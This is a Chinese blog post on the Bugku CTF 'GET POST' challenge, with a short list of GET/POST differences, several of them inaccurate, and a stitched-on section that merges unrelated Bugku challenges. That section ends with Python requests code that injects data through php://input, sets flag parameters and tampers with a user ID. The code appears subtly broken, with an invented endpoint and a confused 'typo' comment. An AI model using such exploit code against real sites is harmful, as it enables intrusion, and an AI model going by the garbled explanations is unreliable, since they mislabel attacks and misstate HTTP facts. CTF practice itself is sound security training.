Bugku--CTF-- GET POST

本文对比GET与POST方法在数据位置、大小限制、请求次数和缓存行为上的区别,深入解析两者在Web开发中的角色。
部署运行你感兴趣的模型镜像

1、GET
在这里插入图片描述在这里插入图片描述
url后加上?what=flag
在这里插入图片描述
在这里插入图片描述

2、POST
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
GET与POST的区别
GET和POST是HTTP请求的两种基本方法
a:发送数据的位置不一样,一个在url中,一个在请求体中。
b:发送数据的大小不一样,get有限制,而post没有。
c:GET请求发送一次,POST请求发送两次。
d:GET会被浏览器进行主动缓存,而POST不会。

您可能感兴趣的与本文相关的镜像

Llama Factory

Llama Factory

模型微调
LLama-Factory

LLaMA Factory 是一个简单易用且高效的大型语言模型(Large Language Model)训练与微调平台。通过 LLaMA Factory,可以在无需编写任何代码的前提下,在本地完成上百种预训练模型的微调

### Bugku CTF 警报信息解析 在Bugku平台上的CTF挑战中,存在特定的机制用于测试参赛者的Web安全技能。当面对文件包含漏洞时,可以通过构造特定的有效载荷来触发预期的行为。 对于给定的情况,在处理PHP代码中的`$data = @file_get_contents($a, 'r')`语句时,如果目标是要读取并显示字符串“bugku is a nice platform!”,那么可以利用PHP伪协议`php://input`作为参数传递给变量$a[^1]。这允许攻击者通过POST请求注入自定义数据流,从而实现远程文件包含的效果。 另外一种情况涉及到设置某些特定参数使得它们能够匹配预设条件。例如,让`a`和`c`以及组合形式`ac`等于字符串`flags`,并且另一个参数`fn`指向名为`flag.txt`的文件路径[^2]。这种情况下,服务器端逻辑可能被设计成响应这些特殊输入模式以揭示隐藏的内容或行为。 还有一个有趣的实例是在身份验证过程中发现了标记为“小bug”的ID字段。经过多次尝试不同的登录方式之后,最终发现使用QQ号码登录会暴露用户的个人资料信息,包括ID和头像链接。进一步实验表明修改用户ID为“小bug”,并通过拦截HTTP请求篡改上传图片的数据包可以获得额外线索,进而获取到Flag[^3]。 ```python import requests def exploit_php_input(url): payload = {'a': 'php://input'} data = "bugku is a nice plateform!" response = requests.post(url, params=payload, data=data) return response.text def set_flag_parameters(url): params = { 'a': 'f', 'c': 'lags', # Note the typo to match exactly with mentioned condition. 'ac': 'flags', 'fn': 'flag.txt' } response = requests.get(url, params=params) return response.text def change_user_id_to_bug(url, session_cookie=None): headers = {} if session_cookie: headers['Cookie'] = f'session={session_cookie}' modified_data = {"id": "小bug"} response = requests.patch(f"{url}/profile", json=modified_data, headers=headers) return response.status_code == 200 and b'flag{' in response.content ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值